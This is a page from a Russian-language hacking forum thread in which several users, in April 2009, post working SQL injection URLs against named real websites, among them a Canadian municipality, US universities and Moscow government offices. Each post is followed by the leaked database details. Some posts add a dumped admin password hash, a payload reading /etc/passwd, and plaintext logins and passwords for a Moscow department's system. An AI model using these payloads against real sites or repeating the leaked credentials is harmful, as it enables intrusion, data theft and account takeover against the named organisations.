ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8751  
Старый 07.04.2009, 21:52
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Pagerank: 5
http://www.saugeenshores.ca/municipal/main.php?PageID=193+and+substring(y(),1,1)=x


y1=version
y2=database
y3=user

x=Version : 3.23.56-Max
Database : saugeenshores
User : saugeendb@localhost
 
Ответить с цитированием

  #8752  
Старый 07.04.2009, 21:52
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.natinc.us/event-display.php?id=1067/**/UNION/**/SELECT/**/1,2,3,4/**/LIMIT/**/1,1/*

Database Version: 5.0.37
Database name: tenenz
User name: tenendbuser@localhost

есть jos_users

admin:c08bb1867315ff4f6c335163f065284d

load_file

http://www.natinc.us/event-display.php?id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*
 
Ответить с цитированием

  #8753  
Старый 07.04.2009, 23:35
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

ardo.ru
тиц 1000

Database Version: 4.1.22
Database name: ardo_ardo
User name: ardo_mysql@194.85.92.172

Код:
http://www.ardo.ru/main.php?trid=-1+union+select+1,4,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16

dvuser.co.uk

Database Version: 4.0.27-standard-log
Database name: db1
User name: dbo136296934@212.227.29.17

Код:
http://www.dvuser.co.uk/content.php?CID=99999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11

www.madinacenter.com

Database Version: 5.0.67-community
Database name: madina_Madina
User name: madina_madina@localhost

Код:
http://www.madinacenter.com/post.php?DataID=-1+union+Select+1,2,3,concat(user(),version(),database()),concat(uname,0x3a,upass),6,7+from+users

kvodrat.ru

Database Version: 5.0.67-log
Database name: u61710_kv
User name: u61710@10.10.153.180

Код:
http://kvodrat.ru/index.php?note=-1+union+select+1,concat(login,0x3a,pass),concat(user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15+from+kv_adminusers
 
Ответить с цитированием

  #8754  
Старый 08.04.2009, 01:24
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Pagerank: 4
http://www.pumpkinfest.org/news_full.php?NewsID=32+and+substring(y(),1,1)=x


y1=version
y2=database
y3=user

x=Version : 3.23.56-Max
Database : pumpkinfest
User : pumpkindb@localhost
 
Ответить с цитированием

  #8755  
Старый 08.04.2009, 01:29
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://more.poetrysociety.org.uk/landmark/display.php?id=-1664/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32/*

Database Version: 5.0.41-log
Database name: poetrysociety
User name: poet@localhost
 
Ответить с цитированием

  #8756  
Старый 08.04.2009, 11:51
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.montclair.edu/undergraduate_catalog/view_requirements.php?DepartmentID=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+us ers/*
Db: catalog_test
User: dynamic_map@webapp1
Version: 5.0.19-standard-log

========================================
Цитата:
http://www.ischool.utexas.edu/courses/class_details.php?ClassID=-1705'+union+select+1,2,3,4,5,6,user(),version(),9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28/*
User: ischool@localhost
Version: 5.0.45
Db: iSchool
========================================
Цитата:
http://www.fordschool.umich.edu/current/course_description.php?courseid=-1095+union+select+1,2,3,4,5,user(),7,8,9,10,11,12, 13/*
User: fordschool@romanian.web.itd.umich.edu
Version: 5.0.45-log
Dbname: fordschool

Последний раз редактировалось $n@ke; 08.04.2009 в 12:02..
 
Ответить с цитированием

  #8757  
Старый 08.04.2009, 14:41
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Кузовные запчасти для иномарок в Санкт-Петербурге

Код:
http://forwardsp.ru/catalog/?car=2871+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17--
Запчасти для автомобилей иностранного производства со склада в Санкт-Петербурге.

Код:
http://avto-import.org/price.php?c=7+and+substring(version(),1,1)=4
 
Ответить с цитированием

  #8758  
Старый 08.04.2009, 16:04
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Северный административный округ "Москва">>
Код:
http://beg.sao.mos.ru/news_full.php?id=-18760+union+select+1,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),3,4,5--+
db: 4.1.12
name_db: sao
user: sao@chicken
os: redhat-linux-gnu
 
Ответить с цитированием

  #8759  
Старый 08.04.2009, 16:11
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://sibaero.ru/index.php?module=xid&func=viewpub&tid=1&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),databas e(),user()),19,20,21,22,23,24/*

Database Version : 4.1.22-log:
Database name : db_sibaero_sibaero
User name : sibaero_sibaero@localhost


-------------------------------------------------------------+

Код:
http://www.krani.ru/index.php?ids=-1+union+select+1,2,concat_w s( 0x3a,version(),database(),user()),4,5,6,7--
Database Version : 4.1.22
Database name : krani00
User name : krani00@localhost


-------------------------------------------------------------+

Код:
http://www.kubrti.ru/news?id=-24+unIOn+sELeCT+1,2,3,concat_ ws(0x3a,version(),database(),user()),5--
Database Version : 4.0.27-log
Database name : ksvksv99
User name : ksvksv99@v25.valuehost.ru


-------------------------------------------------------------+

Код:
http://www.motordetal.com.ua/news/index.php?id_year=-2007+union+select+1,2,concat_ ws(0x3a,version(),database(),user())--
Database Version : 4.1.25-log
Database name : motor
User name : motoradmin@hosting01.iptelecom.net.ua


-------------------------------------------------------------+

Код:
http://www.fa13.com/news.html?id=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--
Database Version : 4.1.10a
Database name : fa13_add
User name : fa13_forum@localhost
 
Ответить с цитированием

  #8760  
Старый 08.04.2009, 16:33
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Департамент Науки и Промышленной Политики города Москвы>>
Код:
http://www.dnpp.ru/smi.php?id=-129'+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10--+
db: 5.0.67-community-nt
name_db: dnpp
user: duser@localhost
os: Win32

table: _system_users
log: PSS
pass: PsS , помог расшифровать f1ng3r спс ++ с меня в следующий пост
status: boss

log: user
pass: user
status: user

Последний раз редактировалось farex; 08.04.2009 в 16:43.. Причина: Спосибо f1ng3r за расшифровку хеша
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ